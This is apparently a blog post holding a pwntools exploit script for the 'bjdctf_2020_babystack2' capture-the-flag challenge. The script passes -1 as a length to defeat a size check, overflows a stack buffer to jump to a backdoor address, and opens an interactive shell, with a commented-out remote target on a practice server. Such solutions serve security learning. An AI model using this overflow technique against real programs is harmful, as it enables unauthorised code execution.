bjdctf_2020_babystack2
exp
from pwn import *
context.log_level = 'debug'
proc_name = './bjdctf_2020_babystack2'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 26363)
elf = ELF(proc_name)
p.sendlineafter('name:', str(-1))
backdoor = 0x400726
payload = b'a' * (0x10 + 0x8) + p64(backdoor)
p.sendafter('name?', payload)
p.interactive()
还没有评论,来说两句吧...